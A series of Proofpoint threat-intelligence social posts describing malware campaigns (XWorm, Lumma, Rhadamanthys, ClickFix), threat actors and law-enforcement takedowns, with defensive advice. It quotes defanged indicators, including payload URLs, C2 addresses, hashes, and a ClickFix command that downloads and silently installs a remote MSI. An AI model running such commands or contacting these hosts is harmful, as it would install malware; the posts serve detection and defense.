Proofpoint is proud to have assisted law enforcement in the #OperationEndgame investigation that led to the November 13, 2025 disruption of #Rhadamanthys and #VenomRAT, both #malware used by multiple cybercriminals.

• Rhadamanthys: https://brnw.ch/21wXs1N
• VenomRAT: https://brnw.ch/21wXs1O

---

Since May 2024, Operation Endgame—a global law enforcement and private sector effort that includes Proofpoint—has significantly disrupted the #malware and #botnet ecosystem.

👉 #Europol called the May 2024 Operation Endgame actions “the largest ever operation against botnets.”

👉 In May 2025, additional malware families and their creators, including #DanaBot, were taken down.

---

Each disruption forces threat actors to adapt and invest time and resources to retool their attack chains.

With our unique visibility and leading detection capabilities, Proofpoint researchers will continue monitoring the threat landscape and provide insight into the biggest cyber threats to society.

From Old West train robbers 🚂 to 1960s mobsters 💰, #cargotheft is an age-old problem—now it’s gone digital. 💻

In a revealing blog, our threat researchers detail the #digitaltransformation of cargo theft, and how criminals are combining #socialengineering with their #trucking and #transportation industry knowledge to steal real, physical goods. 📦

🔗 https://www.proofpoint.com/us/blog/threat-insight/remote-access-real-cargo-cybercriminals-targeting-trucking-and-logistics

---

Cargo theft leads to $34 billion in losses annually in the U.S. It is massively impactful for the #supplychains, exploiting #logistics technology that underpins today’s commerce. 💸

We’re tracking cybercriminals enabling this activity. Here’s how it works:

Hackers compromise trucking and transport companies, then post fake "loads" for truckers and brokers to claim.
⬇️
Once the trucker replies, they infect them with malicious RMMs to overtake their company. They then try to bid on real loads to intercept and pick them up.
⬇️
The stolen loads/cargo/physical goods are then sold overseas or elsewhere.

Proofpoint threat researchers have designed an open-source tool—named PDF Object Hashing—to track and detect the unique characteristics of PDFs used by threat actors... similar to a digital fingerprint. 🫆

We use this tool internally to help track multiple threat actors with high confidence, improving attribution in many cases.

The tool has been released in the Proofpoint Emerging Threats public #GitHub for other defenders to leverage.

Learn more about it here: https://www.proofpoint.com/us/blog/threat-insight/proofpoint-releases-innovative-detections-threat-hunting-pdf-object-hashing

#PDF #threatdetection #cyberthreat

With the goal of better understanding cloud account takeover (ATO) attacks, our threat researchers developed a tool that automates the creation of malicious internal applications within a compromised cloud environment.

This blog post provides an in-depth technical analysis of that tool and its implications for enterprise security.

🔗 https://www.proofpoint.com/us/blog/threat-insight/beyond-credentials-weaponizing-oauth-applications-persistent-cloud-access

#cloud #ATO #credentials #OAuth #cyberrisk #accounttakeover

Since 14 October, we’ve tracked a high volume XWorm campaign targeting Germany. The activity is attributed to TA584, a sophisticated #cybercrime group tracked since 2020.

Messages are sent from hundreds of compromised sender accounts impersonating ELSTER and contain malicious URLs.

These URLs are either attacker-controlled URLs hosted on compromised websites, AWS-hosted URLs that redirect to those same sites, or unique Trend Micro click-time protection URLs that redirect to the AWS URLs. Proofpoint has notified Trend Micro about the potential abuse.

The compromised websites redirect the user to the attacker-controlled domain, which performs IP filtering. If passed, the visitor is redirected to the LP which contains a matching themed page with a "Slide" CAPTCHA. If the CAPTCHA is resolved, a ClickFix page guides users to follow instructions.

If the ClickFix instructions are followed, it will execute a remote PowerShell script that disables AMSI, loads a memory‑only .NET loader (included in the script) which injects an XWorm payload into RegSvcs.exe, clears the clipboard, and exits.

The user is redirected to a legit website if the ClickFix command is successful. This is done via server-side check (most likely based on IP) and response to post to https[:]//[InvolvedHostName][.]top/api/exe.

Proofpoint tracks this variant of XWorm as “P0WER” due to that is uses this string as AES Key. This variant always uses SharpHide for persistence by setting up a hidden registry key that will execute another remote PowerShell script on each boot to run XWorm again.

Proofpoint assesses TA584 is an initial access provider whose compromises can lead to #ransomware.

Historically, this actor focused on North America and the UK. TA584 expanded its targeting to include European entities including Germany since 1 July 2025.

---

Landing page: hxxps://www[.]eportal-npa[.]elster-de[.]quick-print[.]top/ePortal/ or hxxps://www[.]npa-eportal[.]digital-service[.]elster-de[.]status-drive[.]top/ePortal/

Click Payload: hxxp://94[.]159[.]113[.]37/ssd.png | b6956f45bd3c7b3009a31f0caf087d0686e60ee96978766a9f6477b8b093eace

XWorm C2: 85[.]208[.]84[.]208:4411

SharpHide Payload: 85[.]208[.]84[.]208/x.jpg

Meet TA585: A sophisticated cybercriminal actor named by Proofpoint that stands out for its innovation in the evolving threat landscape.

In this blog, our researchers detail the identification, behaviors and activity of TA585. Notably, it owns its operation of the entire attack chain, from infrastructure and email delivery to malware installation.

⚠️ Learn all the details about this advanced threat here: https://www.proofpoint.com/us/blog/threat-insight/when-monster-bytes-tracking-ta585-and-its-arsenal

#TA585 #MonsterV2 #malware #cyberthreat #cybercrime #ClickFix #PowerShell #GitHub

Researchers at Proofpoint have uncovered a recent brute force campaign, tracked as UNK_CustomCloak, targeting the first-party app, Windows Live Custom Domains.

Activity was observed from September 20th-30th, affecting nearly half a million users in over 4,000 tenants.

Windows Live Custom Domains (92bcc0b3-6fb6-40a5-9577-53629580dc3e) is a legacy service that allows domain owners to use Outlook with their own domains.

No malicious activity was observed in the application in the following months, indicating a shift in attacker tactics.

The threat actor is seen rotating through over half a million IPs, predominantly IPv6. The method for spoofing user agents results in non-existent browser versions with a matching Chrome & Edge number, which can be used to uniquely characterize the campaign.

---

Example UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/1000005345.0.0.0 Safari/537.36 Edg/1000005345.0.0.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/10408.0.0.0 Safari/537.36 Edg/10408.0.0.0

Proofpoint threat researchers published new research identifying a new cyber-espionage campaign by #TA415 (#APT41), a China-aligned threat actor, exploiting growing uncertainty in U.S.-China economic relations.

🔗 Full blog: https://www.proofpoint.com/us/blog/threat-insight/going-underground-china-aligned-ta415-conducts-us-china-economic-relations

The group is impersonating trusted organizations and policymakers to target U.S. government, academic, and think tank targets.

See our blog for a detailed breakdown of these July and August 2025 campaigns, infection chain, IOCs, and Emerging Threats rulesets. 

Threat actors continue to abuse GitHub to deliver malware, this time: #LummaStealer. We identified GitHub notification emails that kick off the attack chain. Messages are sent when the threat actor, using an actor-controlled account, comments on existing GitHub issues.

The comment includes either a link to the actor-controlled domain droplink[.]digital, a Dropbox URL, or a file attached directly to the issue (which creates a link to the file hosted on GitHub). They claim to provide a fix for the reported problem. People who get these emails may include: the issue creator, the repository owner, the issue assignee, or any watchers.

The downloaded file is always named “fix.zip”, which contains “x86_64-w64-ranlib.exe” and “msvcp140.dll”. If the executable is run, it launches #Lumma via “msbuild.exe”.

The hash of the executable (and therefore the ZIP file) may vary depending on when the Lumma payload was built. Example:

File name: fix.zip

Retrieved From: hxxps://objects[.]githubusercontent[.]com/github-production-repository-file-5c1aeb/195216627/22101425?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20250903%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250903T111859Z&X-Amz-Expires=300&X-Amz-Signature=f0cd8226472614321e6b9e3b883bffe0adf9d9255af1207374947ea71d3c8f76&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3Bfilename%3Dfix.zip&response-content-type=application%2Fx-zip-compressed

MD5: 4d8730a2f3388d018b7793f03fb79464

SHA1: cbc5b2181854a2672013422e02df9ea35c3c9e1c

SHA256: c8af1b27b718508574055b4271adc7246ddf4cec1c50b258d2c4179b19d0c839

Although GitHub has removed some of the malicious comments, the links in the messages remained active as of September 3, including the actor-controlled URLs.

On September 2-3 some of the files attached to the issues had random file names and were encrypted. While they contained an executable with the same name, the threat actor did not provide the password for these files so they could not be extracted and lead to any malware installation.

Threat actors are exploiting #Microsoft365 Direct Send to make their phishing campaigns appear to originate from inside an organization.

On this episode of DISCARDED, Selena Larson and Jason Ford explain why legacy features like Direct Send are a prime target for cybercriminals, and share actionable advice for defenders.

Stream now on your favorite #podcast platform:

Apple Podcasts: https://brnw.ch/21wVja2
Spotify: https://brnw.ch/21wVja4
Web player: https://brnw.ch/21wVja5

Something #spicy is coming to the next Only Malware in the Building podcast—dropping September 2. 🌶️

Bookmark the show page and reserve your seat at the table 🪑 alongside @selenalarson, Dave Bittner and Keith Mularski.

🔥 You won't want to miss it! https://thecyberwire.com/podcasts/only-malware-in-the-building

#podcast #hotones

You asked, we answered. AI tools are significantly lowering the barrier to entry for cybercriminals.

Proofpoint recently observed threat actor campaigns leveraging the AI-generated website builder #Lovable to create and host credential #phishing, #malware, and #fraud websites.

Tens of thousands of Lovable URLs have been flagged by our team in email and SMS data since February 2025.

See our blog to see all the campaign details and learn how automatic, AI-powered, web creation tools are affecting the threat landscape. https://brnw.ch/21wV3DD

#LovableAI #webapp #webbuilder #impersonation

Proofpoint identified a unique attack chain leveraging GitHub notifications to deliver #Rhadamanthys.

We first spotted this post by @anyrun_app about ClickFix delivering Rhadamanthys and began investigating. https://infosec.exchange/@anyrun_app/115019769476243964

We identified GitHub notification emails that kick off the attack chain. The emails are likely generated by the threat actor creating an issue in an actor-controlled repository with a fake security warning, and then tagging legitimate accounts who receive notifications that they have been tagged, with the text from the issue.

The notifications contain shortened URLs that will lead to an actor-controlled website. The website will perform filtering functions, and if those checks are passed, the visitor will be redirected to a website that presents a fake GitHub-branded CAPTCHA instructing users to verify they are human.

Following the instructions will initiate a command that downloads and executes malware.

The specific malware may vary throughout the campaign.

At the time of analysis, the ClickFix Payload URL has led to the Rhadamanthys malware.

Notably, this chain uses CoreSecThree infrastructure, previously only observed to be used on compromised websites as an inject.

CoreSecThree is a delivery framework leveraged for filtering and enabling ClickFix campaigns to distribute malware, typically information stealers.

CoreSecThree is likely operated by a single threat actor. Proofpoint assesses with medium confidence that both the campaigns via compromised websites and this GitHub campaign are performed by the same threat actor.

Example ClickFix command: msiexec /i hxxps:///temopix[.]com /qn

Example of MSI: shields.msi | File Size: 10981376 Byte(s) (10,47 MB) | SHA256: 4c9df28e6b802ebe9e40f8fe34d2014b1fe524c64f7c8bd013f163c4daa794b2

Example system commands:

C:\Users\<username>\AppData\Local\Programs\MediaHuman Lyrics Finder Free\LdVBoxSVC.exe LdVBoxSVC.exe

Bitly redirect: hxxps://gitsecguards[.]com

ClickFix Landing domain: security[.]flaxergaurds[.]com

Organizations are encouraged to restrict PowerShell to only approved administrative users.

Proofpoint threat researchers have uncovered a way to sidestep FIDO-based authentication, a protection method used to block credential phishing and account takeover (ATO).

Blog: https://www.proofpoint.com/us/blog/threat-insight/dont-phish-let-me-down-fido-authentication-downgrade

While the tactic has not yet been observed in the wild, the discovery is a significant emerging threat and exposes targets to adversary-in-the-middle (AiTM) threats.

Read our blog to understand how this potential threat questions the reliability of FIDO (Fast Identity Online) passkey implementations, an authentication method currently viewed as robust for verifying user identities and recommended for improving online security.

#FIDO #authentication #ATO #MFA

In a new technical blog, Proofpoint threat researchers detailed their observations of threat actors impersonating well-known enterprises with fake #Microsoft #OAuth applications that redirect to malicious URLs, enabling credential phishing.

See our blog for full campaign details and impersonation examples. We also included tips on how to defend against hybrid (email and cloud) threats. https://www.proofpoint.com/us/blog/threat-insight/microsoft-oauth-app-impersonation-campaign-leads-mfa-phishing

Every threat actor group has its own unique tactics, techniques, and procedures (TTPs). For example, during #taxseason, #TA558 pivots from its typical reservation-themed email lures to target financial firms with tax-related lures.

#TA2541 is known to consistently target organizations in the aerospace, manufacturing, and defense industries using remote access trojans (RATs).

#TA582's TTPs feel like a digital jigsaw puzzle, with simultaneous email, web inject, and compromised site vectors.

Stream this DISCARDED podcast episode to hear all about the chaotic brilliance of mid-tier eCrime actors. https://www.proofpoint.com/us/podcasts/discarded#143240

🚨 Job Seekers, watch out! 🚨 Proofpoint researchers have observed multiple email campaigns impersonating job interview invites from real companies and recruiters.

These emails claim to offer opportunities via Zoom or Teams, but instead lead recipients to install remote management tools (RMM) like SimpleHelp, ScreenConnect, or Atera.

Here's what you need to know:

💻 What’s the threat?
While RMM tools are used legitimately by IT teams, in the hands of cybercriminals, they function like remote access trojans (RATs)—granting attackers full access to your computer, data, and finances.

📬 In one case, a hacked LinkedIn account posted a real job description but swapped in a malicious Gmail address. Proofpoint later discovered this address being used to send fake interview invites to job seekers who had applied.

🔍 How are they doing it?

Threat actors may:

• Create fake job listings to harvest emails
• Hack recruiter inboxes or LinkedIn accounts
• Use lists of stolen email addresses

🎯 This trend is part of a broader wave of cyberattacks where RMM/RAS (remote access software) is used as the initial payload—blending in with normal traffic before launching further attacks like data theft or ransomware.

⚠️ If you're job hunting, stay alert:

• Double-check email sender names and domains
• Be wary of .exe files or suspicious URLs
• If something feels off, trust your instinct

Read more from our threat research team on threats using RMM tools: https://www.proofpoint.com/us/blog/threat-insight/remote-monitoring-and-management-rmm-tooling-increasingly-attackers-first-choice

#OpenToWork #JobSearch #JobScam #RMM

Proofpoint threat researchers released new details on a widespread Request for Quote (RFQ) scam that involves leveraging common Net financing options to steal a variety of high value electronics and goods.

To understand how the scam works, our researchers posed as suppliers with lax finance departments and engaged directly with threat actors.

Step into the mind of a cybercriminal and read all about the anatomy of the scam in this blog: https://www.proofpoint.com/us/blog/threat-insight/net-rfq-request-quote-scammers-casting-wide-net-steal-real-goods

#shipment #RFQ #finance #scam

New Proofpoint threat research revealed an increase in China-aligned cyber #espionage targeting Taiwan’s #semiconductor industry—a sector critical to the global tech #supplychain.

At least 3️⃣ distinct China-aligned threat actors are behind the efforts.

These campaigns likely reflect China’s strategic push for semiconductor self-sufficiency amid tightening US and Taiwanese #export controls.

See this new blog for a breakdown of the tactics, tools, and implications: https://www.proofpoint.com/us/blog/threat-insight/phish-china-aligned-espionage-actors-ramp-up-taiwan-semiconductor-targeting

Espionage 🤝 Cybercrime :: TA829 🤝 UNK_GreenSec

Our extensive visibility into the threat landscape has led us to conclude that there is very likely a link between TA829 (a cybercriminal actor also conducting #espionage in line with Russian state interests) & UNK_GreenSec (a #cybercriminal cluster observed deploying #malware and #ransomware).

See our research blog for a technical analysis of the intriguing overlap between the threat actor clusters. https://brnw.ch/21wTN3n